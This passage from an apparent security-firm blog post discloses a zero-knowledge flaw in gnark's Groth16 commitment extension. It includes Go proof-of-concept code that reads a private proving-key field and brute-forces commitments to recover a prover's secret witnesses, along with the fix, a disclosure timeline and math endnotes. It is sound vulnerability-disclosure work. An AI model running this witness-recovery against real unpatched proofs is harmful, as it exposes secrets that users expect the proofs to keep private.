var circ Circuit
ccs, err := frontend.Compile(ecc.BN254.ScalarField(), r1cs.NewBuilder, &circ)
if err != nil {
panic(err)
}

// Assigning some values.
var w Circuit
w.SecretWitness = secret

// Running setup and prover.
witness, err := frontend.NewWitness(&w, ecc.BN254.ScalarField())
if err != nil {
panic(err)
}
witnessPublic, err := witness.Public()
if err != nil {
panic(err)
}
pk, vk, err := groth16.Setup(ccs)
if err != nil {
panic(err)
}
pkConcrete, ok := pk.(*groth16_bn254.ProvingKey)
if !ok {
log.Fatal("unexpected type for proving key")
}
proof, err := groth16.Prove(ccs, pk, witness)
if err != nil {
panic(err)
}
proofConcrete, ok := proof.(*groth16_bn254.Proof)
if !ok {
log.Fatal("unexpected type for proof")
}

// We check our guess for the secret witness.
var guess_test bn254.G1Affine
basisPoints, err := getBasisField(&pkConcrete.CommitmentKeys[0])
if err != nil {
panic(err)
}
guess_test.ScalarMultiplication(&basisPoints[0], big.NewInt(secret))
fmt.Println("Commitment equal to secret times commitment key basis element: ", guess_test == proofConcrete.Commitments[0])

err = groth16.Verify(proof, vk, witnessPublic)
if err != nil {
panic(err)
}
}

// getBasisField extracts the unexported basis field from a given ProvingKey.
// basis was renamed to Basis and thus made public in newer versions,
// however for gnark 0.10.0, a version of gnark-crypto is used in which the field was still private.
func getBasisField(commitmentPk interface{}) ([]bn254.G1Affine, error) {
// Reflect on the pointer
commitmentPkValue := reflect.ValueOf(commitmentPk)

if commitmentPkValue.Kind() != reflect.Ptr || commitmentPkValue.Elem().Kind() != reflect.Struct {
return nil, fmt.Errorf("expected a pointer to a struct")
}

// Access the 'basis' field
basisField := commitmentPkValue.Elem().FieldByName("basis")
if !basisField.IsValid() {
return nil, fmt.Errorf("field 'basis' not found")
}

if !basisField.CanInterface() {
// To access an unexported field, we need to bypass safety
basisField = reflect.NewAt(basisField.Type(), unsafe.Pointer(basisField.UnsafeAddr())).Elem()
}

basisFieldConcrete, ok := basisField.Interface().([]bn254.G1Affine)
if !ok {
return nil, fmt.Errorf("failed to type assert to []bn254.G1Affine")
}

return basisFieldConcrete, nil
}

The output of running the above program is as follows:

13:24:12 INF compiling circuit
13:24:12 INF parsed circuit inputs nbPublic=0 nbSecret=1
13:24:12 INF building constraint builder nbConstraints=2
13:24:12 DBG constraint system solver done nbConstraints=2 took=0.692767
13:24:12 DBG prover done acceleration=none backend=groth16 curve=bn254 nbConstraints=2 took=2.056221
Commitment equal to secret times commitment key basis element: true
13:24:12 DBG verifier done backend=groth16 curve=bn254 took=3.246638

Range Checks in gnark

While commitments can be used directly in gnark, the most common way a gnark circuit might use commitments is via the standard library’s range checker, which uses commitments internally. Recall the example of a circuit proving knowledge of a decomposition of a number into nontrivial factors that we discussed at the start of the article. In that circuit, the constraints were defined as follows:

func (circuit *ExampleCircuit) Define(api frontend.API) error {
api.AssertIsEqual(circuit.N, api.Mul(circuit.A, circuit.B)) // N = A*B
api.AssertIsDifferent(circuit.A, 0) // A != 0
api.AssertIsDifferent(circuit.A, 1) // A != 1
api.AssertIsDifferent(circuit.B, 0) // B != 0
api.AssertIsDifferent(circuit.B, 1) // B != 1
rangeChecker := rangecheck.New(api)
rangeChecker.Check(circuit.A, bitnum) // 0 <= A < 2^bitnum
rangeChecker.Check(circuit.B, bitnum) // 0 <= B < 2^bitnum
return nil
}

Here, we already used a range check to check that the two factors are values that are at most bitnum bits wide. Such range checks are used quite often when writing circuits.

It is beyond the scope of this article to describe how the range checks in the gnark standard library work, which involves lookups using the log-derivative argument, which in turn uses commitments. What is important for us here is what is committed, which can be described as follows.

When we perform a range check only for a single value xx, then xx is split up into digits to a basis that is a power of two, or in other words, we consider the binary representation of xx and split the bits into limbs that have a certain limb width λ\lambda. Let us assume the resulting value has base-2λ2^\lambda digits (i.e., limbs) x0,,xkx_0, \dots, x_k, ordered from least to most significant. We also need counts of how often limbs appear. Let c0,,c2λ1c_0, \dots, c_{2^\lambda - 1} be the counts so that cic_i is equal to the number of limbs x0,xkx_0, \dots x_k that are equal to ii. Then what will be committed will be (x0,,xk,c0,,c2λ1)\left(x_0, \dots, x_k, c_0, \dots, c_{2^\lambda - 1}\right).

When there is more than one range check, then all range checks will share one commitment. The values committed to will be the concatenation of the limbs for the individual range checks, followed by the joint counts. So counts only occur once and cover all limbs from all range checks.

To make an example, say λ=2\lambda=2, and we range check x=47x=47 and y=123y=123 to be at most eight bits wide. As 47=3+34+24247 = 3 + 3\cdot 4 + 2\cdot 4^2, the limbs for xx will be (3,3,2,0)\left(3, 3, 2, 0\right). For yy, the limbs will be (3,2,3,1)\left(3, 2, 3, 1\right). The counts will be (1,1,2,4)\left(1, 1, 2, 4\right). So the values committed will be (3,3,2,0,3,2,3,1,1,1,2,4)\left(3, 3, 2, 0, 3, 2, 3, 1, 1, 1, 2, 4\right).

The following proof of concept contains the same circuit as the one for the factoring statement we discussed at the start of the article, though we added an additional commitment to each of the two private witnesses. We use bitnum = 8 and set AA and BB to random eight-bit values, setting N=ABN = A\cdot B to satisfy the circuit constraints. After the proof has been created, we first use knowledge of the public instance NN to find all pairs (A,B)(A',B') that satisfy all constraints. Usually, there will be more than one option. What the zero-knowledge property means is that, only knowing the proof (and the setup data, including the proving key), it is supposed to be impossible to learn anything more about the actual values (A,B)(A,B) used by the prover other than that the pair is an element of the list of all possible assignments satisfying the circuit constraints that was just mentioned.

In the proof of concept code, we then first use the commitments to the two private witnesses to individually extract their value, in a manner similar to the example from the previous subsection, though searching the entire search space of numbers up to bitnum-bits wide. We then use the commitment from the two range constraints to again recover AA and BB. This demonstrates how it is possible to recover private witnesses through range checks.

In practice, this attack will only be feasible if the search space is small enough. Given that all range checks share a single commitment, it is likely that most larger circuits, even if individual range checks are done on circuit variables with only a limited space of possible values, perform a sufficient amount of range checks to make the search space intractably large to perform this attack.

package main

import (
"fmt"
"log"
"math/big"
"math/rand"
"reflect"
"unsafe"

"github.com/consensys/gnark-crypto/ecc"
"github.com/consensys/gnark-crypto/ecc/bn254"
"github.com/consensys/gnark-crypto/ecc/bn254/fr"
"github.com/consensys/gnark/backend/groth16"
groth16_bn254 "github.com/consensys/gnark/backend/groth16/bn254"
"github.com/consensys/gnark/frontend"
"github.com/consensys/gnark/frontend/cs/r1cs"
"github.com/consensys/gnark/std/rangecheck"
)

const bitnum = 8

// Here we define which circuit variables our circuit will have.
type ExampleCircuit struct {
A frontend.Variable // Private witness
B frontend.Variable // Private witness
N frontend.Variable `gnark:",public"` // Public instance
}

// This function defines the constraints for our circuit
func (circuit *ExampleCircuit) Define(api frontend.API) error {
api.AssertIsEqual(circuit.N, api.Mul(circuit.A, circuit.B)) // N = A*B
api.AssertIsDifferent(circuit.A, 0) // A != 0
api.AssertIsDifferent(circuit.A, 1) // A != 1
api.AssertIsDifferent(circuit.B, 0) // B != 0
api.AssertIsDifferent(circuit.B, 1) // B != 1
// We commit both private witnesses individually
commitCompiler, ok := api.Compiler().(frontend.Committer)
if !ok {
return fmt.Errorf("compiler does not commit")
}
_, err := commitCompiler.Commit(circuit.A)
if err != nil {
return err
}
_, err = commitCompiler.Commit(circuit.B)
if err != nil {
return err
}
// The following two range checks will together result in one more commitment
rangeChecker := rangecheck.New(api)
rangeChecker.Check(circuit.A, bitnum) // 0 <= A < 2^bitnum
rangeChecker.Check(circuit.B, bitnum) // 0 <= B < 2^bitnum
return nil
}

func main() {
// Compiles our circuit into a R1CS constraint system
var circuit ExampleCircuit
ccs, _ := frontend.Compile(ecc.BN254.ScalarField(), r1cs.NewBuilder, &circuit)

// Groth16 setup, generating the proving key and verification key
pk, vk, _ := groth16.Setup(ccs)

// Witness definition
secret_a := rand.Int63n(1 << bitnum)
secret_b := rand.Int63n(1 << bitnum)
n := secret_a * secret_b
fmt.Printf("\nUsing private witnesses a=%d, b=%d, with n=%d\n\n", secret_a, secret_b, n)
assignment := ExampleCircuit{A: secret_a, B: secret_b, N: n}
witness, _ := frontend.NewWitness(&assignment, ecc.BN254.ScalarField())
publicInstances, _ := witness.Public()

// Proving
proof, _ := groth16.Prove(ccs, pk, witness)

// Verifying
groth16.Verify(proof, vk, publicInstances)

// Converting proving key and proof to concrete types
pkConcrete, ok := pk.(*groth16_bn254.ProvingKey)
if !ok {
log.Fatal("unexpected type for proving key")
}
proofConcrete, ok := proof.(*groth16_bn254.Proof)
if !ok {
log.Fatal("unexpected type for proof")
}

// We first brute-force the search space to find all pairs (a,b) that are possible solutions of the constraints imposed by the circuit, given that we know n.
// The zero-knowledge property with regards to the proof implies that it should be impossible with only knowledge of the proof (and proving key) to find out anything additional about a and b except that (a,b) is among the found pairs.
fmt.Println("\nFinding all pairs (a,b) so that a*b =", n)
for guess_a := int64(0); guess_a < 1<<bitnum; guess_a++ {
for guess_b := int64(0); guess_b < 1<<bitnum; guess_b++ {
if guess_a*guess_b == n {
fmt.Println("Found a = ", guess_a, ", b =", guess_b)
}
}
}

// We now use the individual commitments to brute-force the exact values of a and b
println("\nSearching for secrets by using the solo commitments")
var guess_test bn254.G1Affine
basisPoints, err := getBasisField(&pkConcrete.CommitmentKeys[0])
if err != nil {
panic(err)
}
for guess := int64(0); guess < 1<<bitnum; guess++ {
guess_test.ScalarMultiplication(&basisPoints[0], big.NewInt(guess))
if guess_test == proofConcrete.Commitments[0] {
fmt.Println("Found secret a using the solo commitment: ", guess)
}
}

basisPoints, err = getBasisField(&pkConcrete.CommitmentKeys[1])
if err != nil {
panic(err)
}
for guess := int64(0); guess < 1<<bitnum; guess++ {
guess_test.ScalarMultiplication(&basisPoints[0], big.NewInt(guess))
if guess_test == proofConcrete.Commitments[1] {
fmt.Println("Found secret b using the solo commitment: ", guess)
}
}

// In practice, range checks are the most likely use through which circuits have commitments. We demonstrate here how to recover (a,b) using the commitment arising from the range checks.
println("\nSearching for secrets using the range check commitment")
basisPoints, err = getBasisField(&pkConcrete.CommitmentKeys[2])
if err != nil {
panic(err)
}
for guess_a := int64(2); guess_a < 1<<bitnum; guess_a++ {
for guess_b := int64(2); guess_b < 1<<bitnum; guess_b++ {
// We first get the base 4 limbs and limb counts for a and b separately
guess_list_a, counts_a := NumberToPartsAndCounts(big.NewInt(guess_a))
guess_list_b, counts_b := NumberToPartsAndCounts(big.NewInt(guess_b))
// The limb lists are just concatenated...
guess_list := append(guess_list_a[:], guess_list_b[:]...)
// ...but the counts need to be added.
counts := make([]*big.Int, 4)
for i := range 4 {
counts[i] = big.NewInt(counts_a[i] + counts_b[i])
}
guess_complete := append(guess_list, counts...)
guess_test, err = MultiScalarProduct(basisPoints, guess_complete)
if err != nil {
log.Fatal("MultiScalarProduct failed: ", err)
}
if guess_test == proofConcrete.Commitments[2] {
fmt.Printf("\nFound secrets using the range check commitment: a = %d, b = %d\n", guess_a, guess_b)
}
}
}

}

// Splits num into base-4 limbs and returns them in little-endian order as parts.
// It also returns counts, which contain how often each value from 0 to 3 occurs as a base-4 limb.
func NumberToPartsAndCounts(num *big.Int) (parts [bitnum / 2]*big.Int, counts [4]int64) {
base := new(big.Int).Lsh(big.NewInt(1), uint(2))
tmp := new(big.Int).Set(num)

for i := int64(0); i < bitnum/2; i++ {
scratch := big.NewInt(0)
scratch.Mod(tmp, base)
tmp.Rsh(tmp, uint(2))
parts[i] = scratch
counts[scratch.Int64()]++
}
return
}

// Wrapper to compute a multi-scalar product
func MultiScalarProduct(points []bn254.G1Affine, scalars []*big.Int) (bn254.G1Affine, error) {
if len(points) != len(scalars) {
return bn254.G1Affine{}, fmt.Errorf("points and scalars must have the same length")
}

// Convert []*big.Int to []fr.Element
convertedScalars := make([]fr.Element, len(scalars))
for i, scalar := range scalars {
convertedScalars[i].SetBigInt(scalar)
}

// Setup MultiExpConfig
config := ecc.MultiExpConfig{
NbTasks: 1,
}

// Call the MultiExp method
var result bn254.G1Affine
_, err := result.MultiExp(points, convertedScalars, config)
if err != nil {
return bn254.G1Affine{}, err
}

return result, nil
}

// getBasisField extracts the unexported basis field from a given ProvingKey.
// basis was renamed to Basis and thus made public in newer versions,
// however for gnark 0.10.0, a version of gnark-crypto is used in which the field was still private.
func getBasisField(commitmentPk interface{}) ([]bn254.G1Affine, error) {
// Reflect on the pointer
commitmentPkValue := reflect.ValueOf(commitmentPk)

if commitmentPkValue.Kind() != reflect.Ptr || commitmentPkValue.Elem().Kind() != reflect.Struct {
return nil, fmt.Errorf("expected a pointer to a struct")
}

// Access the 'basis' field
basisField := commitmentPkValue.Elem().FieldByName("basis")
if !basisField.IsValid() {
return nil, fmt.Errorf("field 'basis' not found")
}

if !basisField.CanInterface() {
// To access an unexported field, we need to bypass safety
basisField = reflect.NewAt(basisField.Type(), unsafe.Pointer(basisField.UnsafeAddr())).Elem()
}

basisFieldConcrete, ok := basisField.Interface().([]bn254.G1Affine)
if !ok {
return nil, fmt.Errorf("failed to type assert to []bn254.G1Affine")
}

return basisFieldConcrete, nil
}

An example output of the above program is as follows:

17:52:40 INF compiling circuit
17:52:40 INF parsed circuit inputs nbPublic=1 nbSecret=2
17:52:40 INF building constraint builder nbConstraints=21

Using private witnesses a=243, b=46, with n=11178

17:52:40 DBG constraint system solver done nbConstraints=21 took=2.178486
17:52:40 DBG prover done acceleration=none backend=groth16 curve=bn254 nbConstraints=21 took=4.871332
17:52:40 DBG verifier done backend=groth16 curve=bn254 took=3.202103

Finding all pairs (a,b) so that a*b = 11178
Found a = 46 , b = 243
Found a = 54 , b = 207
Found a = 69 , b = 162
Found a = 81 , b = 138
Found a = 138 , b = 81
Found a = 162 , b = 69
Found a = 207 , b = 54
Found a = 243 , b = 46

Searching for secrets by using the solo commitments
Found secret a using the solo commitment: 243
Found secret b using the solo commitment: 46

Searching for secrets using the range check commitment

Found secrets using the range check commitment: a = 243, b = 46

Fix for the Zero-Knowledge Issue

The zero-knowledge issue has been fixed in gnark 0.11.0. For each commitment, an additional private witness is created and appended to the list of circuit variables to commit to. A random value will be assigned to that additional private witness, thereby making the contribution of this extra private witness to the commitment point act as a blinding summand, just like in Pedersen commitments.

How We Found the Vulnerabilities

We encountered gnark’s extension to Groth16 during an audit for one of our clients, Nebra, who is building an aggregator to reduce gas costs for on-chain verification of proofs. The audit concerned changes made to their halo2 circuits performing batched verification of Groth16 proofs, to also support gnark’s extension. Digging into the background for this extension, we found the zero-knowledge issue. Later, when working on an early draft for this blog post and attempting to describe why the extension is sound, we realized that this was not actually the case with more than one commitment present.

Timeline

  • May 27, 2024 — We started our audit for Nebra that involved support for gnark’s extension to Groth16.
  • May 30, 2024 — We found the zero-knowledge vulnerability.
  • May 31, 2024 — We informed gnark about the zero-knowledge vulnerability.
  • June 20, 2024 — We found the soundness vulnerability while writing an early draft of this article.
  • June 20, 2024 — We informed gnark about the soundness vulnerability.
  • August 22, 2024 — Zero-knowledge vulnerability was fixed in commit afda68a.
  • August 27, 2024 — Soundness vulnerability was fixed.
  • September 6, 2024 — Version 0.11.0 of gnark, including the fixes, was released.

About Us

Zellic specializes in securing emerging technologies. Our security researchers have uncovered vulnerabilities in the most valuable targets, from Fortune 500s to DeFi giants.

Developers, founders, and investors trust our security assessments to ship quickly, confidently, and without critical vulnerabilities. With our background in real-world offensive security research, we find what others miss.

Contact us for an audit that’s better than the rest. Real audits, not rubber stamps.

Endnotes

  1. This can be seen as follows. The map φ ⁣:FpkFp,(r0,,rk1)i=0k1rifii=0k1rigi\varphi\colon \mathbb{F}_p^k \to \mathbb{F}_p, \left(r_0, \dots, r_{k-1}\right) \mapsto \sum_{i=0}^{k-1} r_i \cdot f_i - \sum_{i=0}^{k-1} r_i \cdot g_i is a linear map of Fp\mathbb{F}_p vector spaces. We assumed that there is a jj for which fjgjf_j \neq g_j, and one of the two values must be nonzero, which implies that φ\varphi is not the zero map. Hence the image of φ\varphi must have dimension 11, and so the kernel of φ\varphi must have dimension k1k-1 by the rank-nullity theorem. But the kernel of φ\varphi consists exactly of the tuples we were looking for, so the ratio we were looking for is pk1pk=1p\frac{p^{k-1}}{p^k}=\frac{1}{p}.

  2. It is also possible to commit to public instances in gnark’s implementation, but we do not consider that case to simplify the exposition.

  3. For those who are familiar with the details of Groth16 — this must hold separately for the two factors as well as the linear term in the quadratic arithmetic program that the Groth16 scheme is based upon and into which the higher-level commitments one might define in gnark are compiled to. Essentially, this results in a linear relation holding for the polynomials uju_j, for vjv_j, and for wjw_j (Groth16’s notation), which implies that linear relation also after evaluating at xx and hence for LjL_j.